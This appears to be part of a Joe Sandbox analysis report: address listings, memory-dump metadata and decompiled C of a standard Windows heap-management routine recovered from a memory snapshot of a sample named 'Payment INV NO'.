                                                          0x017b9b29
                                                          0x00000000
                                                          0x017b9b2b
                                                          0x018015be
                                                          0x00000000
                                                          0x018015be
                                                          0x017b9b29
                                                          0x017b9ae8
                                                          0x017b9ae8
                                                          0x017b9aeb
                                                          0x017b9aee
                                                          0x018015cb
                                                          0x018015d2
                                                          0x018015d5
                                                          0x018015d7
                                                          0x018015da
                                                          0x018015dc
                                                          0x018015dc
                                                          0x018015dc
                                                          0x018015da
                                                          0x018015e5
                                                          0x018015e9
                                                          0x018015ee
                                                          0x018015f1
                                                          0x018015f3
                                                          0x018015f9
                                                          0x01801600
                                                          0x01801604
                                                          0x01801624
                                                          0x01801629
                                                          0x01801606
                                                          0x0180161c
                                                          0x01801621
                                                          0x01801637
                                                          0x0180163e
                                                          0x01801643
                                                          0x01801649
                                                          0x0180164c
                                                          0x01801650
                                                          0x01801656
                                                          0x0180165d
                                                          0x0180165e
                                                          0x0180165e
                                                          0x01801650
                                                          0x018015f3
                                                          0x017b9af4
                                                          0x017b9af7
                                                          0x017b9afc
                                                          0x017b9b00
                                                          0x017b9b04
                                                          0x017b9b08
                                                          0x017b9b14
                                                          0x017b99fe
                                                          0x017b9a04
                                                          0x017b9a07
                                                          0x00000000
                                                          0x017b9a29
                                                          0x0180169c
                                                          0x018016a0
                                                          0x018016a5
                                                          0x018016a9
                                                          0x018016b5
                                                          0x018016ba
                                                          0x018016bc
                                                          0x018016be
                                                          0x018016c3
                                                          0x018016c3
                                                          0x018016bc
                                                          0x018016c8
                                                          0x018016cc
                                                          0x0180181b
                                                          0x0180181b
                                                          0x0180181e
                                                          0x0180181e
                                                          0x01801821
                                                          0x01801823
                                                          0x01801826
                                                          0x01801829
                                                          0x0180182c
                                                          0x0180182e
                                                          0x01801688
                                                          0x01801688
                                                          0x01801689
                                                          0x0180168b
                                                          0x0180168c
                                                          0x0180168d
                                                          0x0180168f
                                                          0x01801692
                                                          0x00000000
                                                          0x01801692
                                                          0x01801834
                                                          0x01801836
                                                          0x00000000
                                                          0x00000000
                                                          0x0180183f
                                                          0x01801842
                                                          0x01801848
                                                          0x0180184a
                                                          0x01801875
                                                          0x01801875
                                                          0x01801878
                                                          0x0180187b
                                                          0x0180187d
                                                          0x01801880
                                                          0x01801884
                                                          0x018018a7
                                                          0x018018a7
                                                          0x018018aa
                                                          0x018018ad
                                                          0x018018b6
                                                          0x018018bd
                                                          0x018018c0
                                                          0x018018c3
                                                          0x018018c5
                                                          0x018018c8
                                                          0x018018ca
                                                          0x018018ca
                                                          0x018018cd
                                                          0x018018cd
                                                          0x018018c8
                                                          0x018018d5
                                                          0x018018da
                                                          0x018018df
                                                          0x018018e2
                                                          0x018018e5
                                                          0x018018e7
                                                          0x018018ee
                                                          0x018018f2
                                                          0x01801912
                                                          0x01801917
                                                          0x018018f4
                                                          0x0180190a
                                                          0x0180190f
                                                          0x01801925
                                                          0x0180192c
                                                          0x01801931
                                                          0x0180193a
                                                          0x0180193e
                                                          0x01801940
                                                          0x01801947
                                                          0x01801948
                                                          0x01801948
                                                          0x0180193e
                                                          0x018018e5
                                                          0x0180194f
                                                          0x01801952
                                                          0x01801956
                                                          0x0180195d
                                                          0x01801961
                                                          0x0180196d
                                                          0x00000000
                                                          0x0180196d
                                                          0x0180188a
                                                          0x0180188f
                                                          0x01801891
                                                          0x00000000
                                                          0x00000000
                                                          0x0180189d
                                                          0x00000000
                                                          0x0180189d
                                                          0x0180184c
                                                          0x01801859
                                                          0x01801859
                                                          0x0180185c
                                                          0x00000000
                                                          0x00000000
                                                          0x01801851
                                                          0x01801853
                                                          0x01801855
                                                          0x01801865
                                                          0x01801865
                                                          0x01801866
                                                          0x01801868
                                                          0x01801870
                                                          0x00000000
                                                          0x01801870
                                                          0x01801857
                                                          0x01801857
                                                          0x0180185e
                                                          0x00000000
                                                          0x018016d2
                                                          0x018016d2
                                                          0x018016d5
                                                          0x018016d5
                                                          0x018016d8
                                                          0x018016da
                                                          0x018016dd
                                                          0x018016e0
                                                          0x018016e3
                                                          0x018016e5
                                                          0x01801808
                                                          0x01801808
                                                          0x01801809
                                                          0x01801812
                                                          0x01801817
                                                          0x01801817
                                                          0x00000000
                                                          0x01801817
                                                          0x018016eb
                                                          0x018016ed
                                                          0x00000000
                                                          0x00000000
                                                          0x018016f6
                                                          0x018016f9
                                                          0x018016ff
                                                          0x01801701
                                                          0x0180172c
                                                          0x0180172c
                                                          0x0180172f
                                                          0x01801732
                                                          0x01801734
                                                          0x01801737
                                                          0x0180173b
                                                          0x0180175e
                                                          0x0180175e
                                                          0x01801761
                                                          0x01801764
                                                          0x0180176d
                                                          0x01801774
                                                          0x01801777
                                                          0x0180177a
                                                          0x0180177c
                                                          0x0180177f
                                                          0x01801781
                                                          0x01801781
                                                          0x01801784
                                                          0x01801784
                                                          0x0180177f
                                                          0x0180178c
                                                          0x01801791
                                                          0x01801796
                                                          0x01801799
                                                          0x0180179c
                                                          0x0180179e
                                                          0x018017a5
                                                          0x018017a9
                                                          0x018017c9
                                                          0x018017ce
                                                          0x018017ab
                                                          0x018017c1
                                                          0x018017c6
                                                          0x018017dc
                                                          0x018017e3
                                                          0x018017e8
                                                          0x018017ee
                                                          0x018017f1
                                                          0x018017f5
                                                          0x018017f7
                                                          0x018017fe
                                                          0x018017ff
                                                          0x018017ff
                                                          0x018017f5
                                                          0x0180179c
                                                          0x00000000
                                                          0x01801764
                                                          0x01801741
                                                          0x01801746
                                                          0x01801748
                                                          0x00000000
                                                          0x00000000
                                                          0x01801754
                                                          0x00000000
                                                          0x01801754
                                                          0x01801703
                                                          0x01801710
                                                          0x01801710
                                                          0x01801713
                                                          0x00000000
                                                          0x00000000
                                                          0x01801708
                                                          0x0180170a
                                                          0x0180170c
                                                          0x0180171c
                                                          0x0180171c
                                                          0x0180171d
                                                          0x0180171f
                                                          0x01801727
                                                          0x00000000
                                                          0x01801727
                                                          0x0180170e
                                                          0x0180170e
                                                          0x01801715
                                                          0x00000000
                                                          0x01801715
                                                          0x018016cc
                                                          0x017b9a45
                                                          0x017b9a45
                                                          0x017b9a0e
                                                          0x017b9a1c
                                                          0x017b9a23
                                                          0x0180167e
                                                          0x0180167f
                                                          0x01801681
                                                          0x01801683
                                                          0x01801684
                                                          0x00000000
                                                          0x01801684
                                                          0x00000000
                                                          0x017b9aad
                                                          0x017b9aad
                                                          0x017b9ab0
                                                          0x017b9ab3
                                                          0x017b9ab3
                                                          0x017b9ab6
                                                          0x00000000
                                                          0x00000000
                                                          0x017b9ab8
                                                          0x017b9aba
                                                          0x017b9abc
                                                          0x017b9ac8
                                                          0x017b9ac8
                                                          0x00000000
                                                          0x017b9abe
                                                          0x017b9abe
                                                          0x017b9ac0
                                                          0x00000000
                                                          0x017b9ac0
                                                          0x017b9abc
                                                          0x017b9ad2
                                                          0x00000000
                                                          0x017b9ad2
                                                          0x017b9aab

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 778b4a26441f0f2580d199461b8488b7f207f48d19933169a66dbf7a2518644b
                                                          • Instruction ID: a9f23bacfd9bbd4e0130b0634a79b3a649d345fe54cb8238a3d1685de06a644e
                                                          • Opcode Fuzzy Hash: 778b4a26441f0f2580d199461b8488b7f207f48d19933169a66dbf7a2518644b
                                                          • Instruction Fuzzy Hash: 3622147060020A9FEB66CF1CC898BBAFBB5EF44714F248569E555CB385E771DA40CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BE1B9 Relevance: 4.3, Strings: 3, Instructions: 522COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E017BE1B9(void* __ecx, void* __edx, signed short* _a4, signed short _a8, char _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t191;
				signed short _t196;
				intOrPtr _t197;
				signed short _t201;
				signed short _t202;
				signed short _t210;
				signed short _t217;
				signed int _t219;
				signed short _t221;
				signed short _t223;
				signed short _t228;
				signed short _t231;
				signed short _t232;
				signed short _t234;
				signed short _t237;
				signed short _t239;
				intOrPtr _t240;
				intOrPtr _t246;
				signed int _t254;
				signed short _t257;
				signed short _t264;
				signed short _t267;
				signed short _t271;
				signed short _t273;
				signed short _t278;
				signed short _t281;
				signed short _t282;
				signed short _t284;
				signed short _t285;
				signed short _t287;
				signed short* _t288;
				signed short* _t289;
				signed short* _t290;
				signed short* _t291;
				signed short* _t292;
				signed short* _t293;
				signed short* _t294;
				signed int _t299;
				signed short* _t300;
				signed char _t305;
				signed short _t307;
				signed short _t308;
				signed int _t314;
				signed short _t317;
				signed int _t319;
				signed short _t322;
				signed char _t324;
				signed int _t326;
				signed short _t327;
				signed short _t330;
				signed int _t336;
				void* _t339;
				signed short _t340;
				unsigned int _t343;
				signed int _t346;
				signed short _t348;
				signed int _t349;
				signed short _t351;
				signed short _t352;
				signed int _t355;
				signed int _t358;
				signed int _t361;
				void* _t365;
				signed short* _t366;
				signed int _t367;
				signed int _t368;

				_t339 = __edx;
				_v8 = _v8 & 0x00000000;
				_t366 = _a4;
				_t365 = __ecx;
				_t366[1] = _a8;
				_t366[3] = 0;
				_t7 = _t365 + 0x54; // 0x180126a
				_t366[2] =  *_t7 ^ _a16;
				_t10 = _t339 + 0x18; // 0xfffffffe
				if( *_t10 == __edx) {
					_t287 = 0;
				} else {
					_t287 = (_t366 - __edx >> 0x10) + 1;
					if(_t287 >= 0xfe) {
						_push(__ecx);
						_push(0);
						L0185A80D( *((intOrPtr*)(__edx + 0x18)), 3, _t366, __edx);
					}
				}
				_t191 = _a20;
				_t299 = _t191 & 0x0000ffff;
				_t366[3] = _t287;
				_t366[1] = 0;
				_v20 = _t299;
				_t288 = _t366 + _t191 * 8;
				 *_t366 = _t299;
				while(1) {
					_t17 = _t365 + 0x4c; // 0x2
					_t18 = _t365 + 0x52; // 0x126a0180
					if((( *_t17 >> 0x00000014 &  *_t18 ^ _t288[1]) & 0x00000001) != 0) {
						break;
					}
					__eflags =  *(_t365 + 0x4c);
					if( *(_t365 + 0x4c) != 0) {
						_t54 = _t365 + 0x50; // 0x1801257
						_t343 =  *_t54 ^  *_t288;
						 *_t288 = _t343;
						_t305 = _t343 >> 0x00000010 ^ _t343 >> 0x00000008 ^ _t343;
						__eflags = _t343 >> 0x18 - _t305;
						if(__eflags != 0) {
							_push(_t305);
							L0184FA2B(_t288, _t365, _t288, _t365, _t366, __eflags);
						}
					}
					_t340 = _t288[6];
					_t56 =  &(_t288[4]); // 0xddeeddf7
					_t300 = _t56;
					_t196 =  *_t300;
					_v12 = _t196;
					_v16 = _t340;
					_t197 =  *((intOrPtr*)(_t196 + 4));
					__eflags =  *_t340 - _t197;
					if( *_t340 != _t197) {
						L67:
						_push(_t300);
						_push( *_t340);
						L0185A80D(_t365, 0xd, _t300, _t197);
						goto L68;
					} else {
						__eflags =  *_t340 - _t300;
						if( *_t340 != _t300) {
							goto L67;
						}
						 *((intOrPtr*)(_t365 + 0x74)) =  *((intOrPtr*)(_t365 + 0x74)) - ( *_t288 & 0x0000ffff);
						_t62 = _t365 + 0xb4; // 0x0
						_t352 =  *_t62;
						__eflags = _t352;
						if(_t352 == 0) {
							L41:
							_t322 = _v16;
							_t201 = _v12;
							 *_t322 = _t201;
							 *(_t201 + 4) = _t322;
							__eflags = _t288[1] & 0x00000008;
							if((_t288[1] & 0x00000008) != 0) {
								_t202 = E017BA229(_t365, _t288);
								__eflags = _t202;
								if(_t202 != 0) {
									goto L42;
								}
								E017BA309(_t365, _t288,  *_t288 & 0x0000ffff, 1);
								L68:
								__eflags = _v8;
								if(_v8 != 0) {
									return 0;
								}
								_v8 = 1;
								continue;
							}
							L42:
							__eflags = _a12;
							if(_a12 != 0) {
								_t324 = _t288[1];
								__eflags = _t324 & 0x00000004;
								if((_t324 & 0x00000004) != 0) {
									_t237 = ( *_t288 & 0x0000ffff) * 8 - 0x10;
									_v8 = _t237;
									__eflags = _t324 & 0x00000002;
									if((_t324 & 0x00000002) != 0) {
										__eflags = _t237 - 4;
										if(_t237 > 4) {
											_t237 = _t237 - 4;
											__eflags = _t237;
											_v8 = _t237;
										}
									}
									_t113 =  &(_t288[8]); // 0xddeeddff
									_t239 = E017ED540(_t113, _t237, 0xfeeefeee);
									_v16 = _t239;
									__eflags = _t239 - _v8;
									if(_t239 != _v8) {
										_t240 =  *[fs:0x30];
										__eflags =  *(_t240 + 0xc);
										if( *(_t240 + 0xc) == 0) {
											_push("HEAP: ");
											E0179B150();
										} else {
											E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t288);
										E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t288);
										_t246 =  *[fs:0x30];
										__eflags =  *((char*)(_t246 + 2));
										if( *((char*)(_t246 + 2)) != 0) {
											 *0x1886378 = 1;
											asm("int3");
											 *0x1886378 = 0;
										}
									}
								}
							}
							_t366[1] = _t288[1];
							_t355 = _a20 + ( *_t288 & 0x0000ffff);
							__eflags = _t355 - 0xfe00;
							if(_t355 > 0xfe00) {
								E017BA830(_t365, _t366, _t355);
								goto L26;
							} else {
								_t326 = _t355 & 0x0000ffff;
								 *_t366 = _t326;
								_t75 = _t365 + 0x54; // 0x180126a
								__eflags = _a12;
								 *(_t366 + 4 + _t355 * 8) =  *_t75 ^ _t326;
								_t209 = _t326;
								_v8 = _t326;
								_t366[3] = 0;
								if(_a12 != 0) {
									_t366[1] = _t366[1] & 0x000000f0;
									__eflags =  *(_t365 + 0x40) & 0x00000040;
									if(( *(_t365 + 0x40) & 0x00000040) != 0) {
										_t129 =  &(_t366[8]); // 0xddeeddfe
										E017ED5E0(_t129, _t209 * 8 - 0x10, 0xfeeefeee);
										_t130 =  &(_t366[1]);
										 *_t130 = _t366[1] | 0x00000004;
										__eflags =  *_t130;
										_t209 = _v8;
									}
									__eflags =  *(_t365 + 0xb4);
									_t134 = _t365 + 0xc0; // 0x186fda8
									_t289 = _t134;
									if( *(_t365 + 0xb4) == 0) {
										_t327 =  *_t289;
									} else {
										_t327 = E017BE12C(_t365, _t209);
									}
									__eflags = _t289 - _t327;
									if(_t289 == _t327) {
										L99:
										_t210 =  *(_t327 + 4);
										_t144 =  &(_t366[4]); // 0xddeeddf6
										_t290 = _t144;
										__eflags =  *_t210 - _t327;
										if( *_t210 != _t327) {
											_push(_t327);
											_push( *_t210);
											__eflags = 0;
											L0185A80D(0, 0xd, _t327, 0);
										} else {
											 *_t290 = _t327;
											_t290[2] = _t210;
											 *_t210 = _t290;
											 *(_t327 + 4) = _t290;
										}
										 *((intOrPtr*)(_t365 + 0x74)) =  *((intOrPtr*)(_t365 + 0x74)) + ( *_t366 & 0x0000ffff);
										_t149 = _t365 + 0xb4; // 0x0
										_t351 =  *_t149;
										__eflags = _t351;
										if(_t351 == 0) {
											L24:
											__eflags =  *(_t365 + 0x4c);
											if( *(_t365 + 0x4c) != 0) {
												_t366[1] = _t366[0] ^  *_t366 ^ _t366[1];
												_t51 = _t365 + 0x50; // 0x1801257
												 *_t366 =  *_t366 ^  *_t51;
												__eflags =  *_t366;
											}
											L26:
											return 1;
										} else {
											_t319 =  *_t366 & 0x0000ffff;
											while(1) {
												__eflags = _t319 -  *((intOrPtr*)(_t351 + 4));
												if(_t319 <  *((intOrPtr*)(_t351 + 4))) {
													break;
												}
												_t217 =  *_t351;
												__eflags = _t217;
												if(_t217 == 0) {
													L29:
													_t219 =  *((intOrPtr*)(_t351 + 4)) - 1;
													L23:
													E017BE4A0(_t365, _t351, 1, _t290, _t219, _t319);
													goto L24;
												}
												_t351 = _t217;
											}
											L22:
											_t219 = _t319;
											goto L23;
										}
									} else {
										_t135 = _t365 + 0x4c; // 0x2
										_t358 =  *_t135;
										while(1) {
											__eflags = _t358;
											if(_t358 == 0) {
												_t221 =  *(_t327 - 8) & 0x0000ffff;
											} else {
												_t223 =  *(_t327 - 8);
												_t137 = _t365 + 0x4c; // 0x2
												_t358 =  *_t137;
												__eflags = _t223 & _t358;
												if((_t223 & _t358) != 0) {
													_t140 = _t365 + 0x50; // 0x1801257
													_t223 = _t223 ^  *_t140;
													__eflags = _t223;
												}
												_t221 = _t223 & 0x0000ffff;
											}
											__eflags = _v8 - (_t221 & 0x0000ffff);
											if(_v8 <= (_t221 & 0x0000ffff)) {
												goto L99;
											}
											_t327 =  *_t327;
											__eflags = _t289 - _t327;
											if(_t289 != _t327) {
												continue;
											}
											goto L99;
										}
										goto L99;
									}
								}
								_t366[1] = 0;
								_t83 = _t365 + 0xc0; // 0x186fda8
								_t291 = _t83;
								__eflags =  *(_t365 + 0xb4);
								if( *(_t365 + 0xb4) == 0) {
									_t330 =  *_t291;
								} else {
									_t330 = E017BE12C(_t365, _t209);
								}
								__eflags = _t291 - _t330;
								if(_t291 == _t330) {
									L54:
									_t228 =  *(_t330 + 4);
									_t93 =  &(_t366[4]); // 0xddeeddf6
									_t290 = _t93;
									__eflags =  *_t228 - _t330;
									if( *_t228 != _t330) {
										_push(_t330);
										_push( *_t228);
										L0185A80D(0, 0xd, _t330, 0);
									} else {
										 *_t290 = _t330;
										_t290[2] = _t228;
										 *_t228 = _t290;
										 *(_t330 + 4) = _t290;
									}
									 *((intOrPtr*)(_t365 + 0x74)) =  *((intOrPtr*)(_t365 + 0x74)) + ( *_t366 & 0x0000ffff);
									_t98 = _t365 + 0xb4; // 0x0
									_t351 =  *_t98;
									__eflags = _t351;
									if(_t351 == 0) {
										goto L24;
									} else {
										_t319 =  *_t366 & 0x0000ffff;
										while(1) {
											__eflags = _t319 -  *((intOrPtr*)(_t351 + 4));
											if(_t319 <  *((intOrPtr*)(_t351 + 4))) {
												goto L22;
											}
											_t231 =  *_t351;
											__eflags = _t231;
											if(_t231 == 0) {
												goto L29;
											}
											_t351 = _t231;
										}
										goto L22;
									}
								} else {
									_t85 = _t365 + 0x4c; // 0x2
									_t361 =  *_t85;
									while(1) {
										__eflags = _t361;
										if(_t361 == 0) {
											_t232 =  *(_t330 - 8) & 0x0000ffff;
										} else {
											_t234 =  *(_t330 - 8);
											_t87 = _t365 + 0x4c; // 0x2
											_t361 =  *_t87;
											__eflags = _t234 & _t361;
											if((_t234 & _t361) != 0) {
												_t90 = _t365 + 0x50; // 0x1801257
												_t234 = _t234 ^  *_t90;
												__eflags = _t234;
											}
											_t232 = _t234 & 0x0000ffff;
										}
										__eflags = _v8 - (_t232 & 0x0000ffff);
										if(_v8 <= (_t232 & 0x0000ffff)) {
											goto L54;
										}
										_t330 =  *_t330;
										__eflags = _t291 - _t330;
										if(_t291 != _t330) {
											continue;
										}
										goto L54;
									}
									goto L54;
								}
							}
						}
						_t336 =  *_t288 & 0x0000ffff;
						while(1) {
							__eflags = _t336 -  *((intOrPtr*)(_t352 + 4));
							if(_t336 <  *((intOrPtr*)(_t352 + 4))) {
								break;
							}
							_t257 =  *_t352;
							__eflags = _t257;
							if(_t257 == 0) {
								_t254 =  *((intOrPtr*)(_t352 + 4)) - 1;
								L40:
								_t64 =  &(_t288[4]); // 0xddeeddf7
								E017BBC04(_t365, _t352, 1, _t64, _t254, _t336);
								goto L41;
							}
							_t352 = _t257;
						}
						_t254 = _t336;
						goto L40;
					}
				}
				_t22 = _t365 + 0x54; // 0x180126a
				_t307 = _v20;
				_t346 = _t307 & 0x0000ffff;
				_t288[2] =  *_t22 ^ _t307;
				_v8 = _t346;
				_t366[3] = 0;
				if(_a12 != 0) {
					_t366[1] = _t366[1] & 0x000000f0;
					__eflags =  *(_t365 + 0x40) & 0x00000040;
					if(( *(_t365 + 0x40) & 0x00000040) != 0) {
						_t159 =  &(_t366[8]); // 0xddeeddfe
						E017ED5E0(_t159, _t346 * 8 - 0x10, 0xfeeefeee);
						_t160 =  &(_t366[1]);
						 *_t160 = _t366[1] | 0x00000004;
						__eflags =  *_t160;
						_t346 = _v8;
					}
					__eflags =  *(_t365 + 0xb4);
					_t164 = _t365 + 0xc0; // 0x186fda8
					_t292 = _t164;
					if( *(_t365 + 0xb4) == 0) {
						_t308 =  *_t292;
					} else {
						_t308 = E017BE12C(_t365, _t346);
					}
					__eflags = _t292 - _t308;
					if(_t292 == _t308) {
						L130:
						_t264 =  *(_t308 + 4);
						_t175 =  &(_t366[4]); // 0xddeeddf6
						_t293 = _t175;
						__eflags =  *_t264 - _t308;
						if( *_t264 != _t308) {
							_push(_t308);
							_push( *_t264);
							__eflags = 0;
							L0185A80D(0, 0xd, _t308, 0);
						} else {
							 *_t293 = _t308;
							_t293[2] = _t264;
							 *_t264 = _t293;
							 *(_t308 + 4) = _t293;
						}
						 *((intOrPtr*)(_t365 + 0x74)) =  *((intOrPtr*)(_t365 + 0x74)) + ( *_t366 & 0x0000ffff);
						_t180 = _t365 + 0xb4; // 0x0
						_t348 =  *_t180;
						__eflags = _t348;
						if(_t348 == 0) {
							L141:
							__eflags =  *(_t365 + 0x4c);
							if( *(_t365 + 0x4c) != 0) {
								_t366[1] = _t366[0] ^  *_t366 ^ _t366[1];
								_t187 = _t365 + 0x50; // 0x1801257
								 *_t366 =  *_t366 ^  *_t187;
							}
							goto L26;
						} else {
							_t314 =  *_t366 & 0x0000ffff;
							while(1) {
								__eflags = _t314 -  *((intOrPtr*)(_t348 + 4));
								if(_t314 <  *((intOrPtr*)(_t348 + 4))) {
									break;
								}
								_t267 =  *_t348;
								__eflags = _t267;
								if(_t267 == 0) {
									_t269 =  *((intOrPtr*)(_t348 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t348 + 4)) - 1;
									L140:
									E017BE4A0(_t365, _t348, 1, _t293, _t269, _t314);
									goto L141;
								}
								_t348 = _t267;
							}
							_t269 = _t314;
							goto L140;
						}
					} else {
						_t165 = _t365 + 0x4c; // 0x2
						_t367 =  *_t165;
						_t349 = _v8;
						while(1) {
							__eflags = _t367;
							if(_t367 == 0) {
								_t271 =  *(_t308 - 8) & 0x0000ffff;
							} else {
								_t273 =  *(_t308 - 8);
								_t168 = _t365 + 0x4c; // 0x2
								_t367 =  *_t168;
								__eflags = _t273 & _t367;
								if((_t273 & _t367) != 0) {
									_t171 = _t365 + 0x50; // 0x1801257
									_t273 = _t273 ^  *_t171;
									__eflags = _t273;
								}
								_t271 = _t273 & 0x0000ffff;
							}
							__eflags = _t349 - (_t271 & 0x0000ffff);
							if(_t349 <= (_t271 & 0x0000ffff)) {
								break;
							}
							_t308 =  *_t308;
							__eflags = _t292 - _t308;
							if(_t292 != _t308) {
								continue;
							}
							break;
						}
						_t366 = _a4;
						goto L130;
					}
				}
				_t366[1] = 0;
				_t29 = _t365 + 0xc0; // 0x186fda8
				_t294 = _t29;
				if( *(_t365 + 0xb4) == 0) {
					_t317 =  *_t294;
				} else {
					_t285 = E017BE12C(_t365, _t346);
					_t346 = _v8;
					_t317 = _t285;
				}
				if(_t294 == _t317) {
					L15:
					_t278 =  *(_t317 + 4);
					_t40 =  &(_t366[4]); // 0xddeeddf6
					_t290 = _t40;
					if( *_t278 != _t317) {
						_push(_t317);
						_push( *_t278);
						L0185A80D(0, 0xd, _t317, 0);
					} else {
						 *_t290 = _t317;
						_t290[2] = _t278;
						 *_t278 = _t290;
						 *(_t317 + 4) = _t290;
					}
					 *((intOrPtr*)(_t365 + 0x74)) =  *((intOrPtr*)(_t365 + 0x74)) + ( *_t366 & 0x0000ffff);
					_t45 = _t365 + 0xb4; // 0x0
					_t351 =  *_t45;
					if(_t351 == 0) {
						goto L24;
					} else {
						_t319 =  *_t366 & 0x0000ffff;
						while(_t319 >=  *((intOrPtr*)(_t351 + 4))) {
							_t281 =  *_t351;
							if(_t281 == 0) {
								goto L29;
							}
							_t351 = _t281;
						}
						goto L22;
					}
				} else {
					_t32 = _t365 + 0x4c; // 0x2
					_t368 =  *_t32;
					L9:
					L9:
					if(_t368 == 0) {
						_t282 =  *(_t317 - 8) & 0x0000ffff;
					} else {
						_t284 =  *(_t317 - 8);
						_t34 = _t365 + 0x4c; // 0x2
						_t368 =  *_t34;
						if((_t284 & _t368) != 0) {
							_t37 = _t365 + 0x50; // 0x1801257
							_t284 = _t284 ^  *_t37;
						}
						_t282 = _t284 & 0x0000ffff;
					}
					if(_t346 > (_t282 & 0x0000ffff)) {
						goto L112;
					}
					L14:
					_t366 = _a4;
					goto L15;
					L112:
					_t317 =  *_t317;
					__eflags = _t294 - _t317;
					if(_t294 != _t317) {
						goto L9;
					}
					goto L14;
				}
			}













































































                                                          0x017be1b9
                                                          0x017be1c4
                                                          0x017be1ca
                                                          0x017be1ce
                                                          0x017be1d0
                                                          0x017be1d3
                                                          0x017be1d7
                                                          0x017be1df
                                                          0x017be1e3
                                                          0x017be1e6
                                                          0x017be305
                                                          0x017be1ec
                                                          0x017be1f3
                                                          0x017be1fa
                                                          0x01803bab
                                                          0x01803bac
                                                          0x01803bb6
                                                          0x01803bb6
                                                          0x017be1fa
                                                          0x017be200
                                                          0x017be203
                                                          0x017be206
                                                          0x017be209
                                                          0x017be20d
                                                          0x017be210
                                                          0x017be213
                                                          0x017be216
                                                          0x017be216
                                                          0x017be21c
                                                          0x017be224
                                                          0x00000000
                                                          0x00000000
                                                          0x017be312
                                                          0x017be316
                                                          0x017be318
                                                          0x017be31b
                                                          0x017be31f
                                                          0x017be32b
                                                          0x017be330
                                                          0x017be332
                                                          0x01803bc0
                                                          0x01803bc5
                                                          0x01803bc5
                                                          0x017be332
                                                          0x017be338
                                                          0x017be33b
                                                          0x017be33b
                                                          0x017be33e
                                                          0x017be340
                                                          0x017be343
                                                          0x017be346
                                                          0x017be349
                                                          0x017be34b
                                                          0x01803be0
                                                          0x01803be0
                                                          0x01803be1
                                                          0x01803bea
                                                          0x00000000
                                                          0x017be351
                                                          0x017be351
                                                          0x017be353
                                                          0x00000000
                                                          0x00000000
                                                          0x017be35c
                                                          0x017be35f
                                                          0x017be35f
                                                          0x017be365
                                                          0x017be367
                                                          0x017be390
                                                          0x017be390
                                                          0x017be393
                                                          0x017be396
                                                          0x017be398
                                                          0x017be39b
                                                          0x017be39f
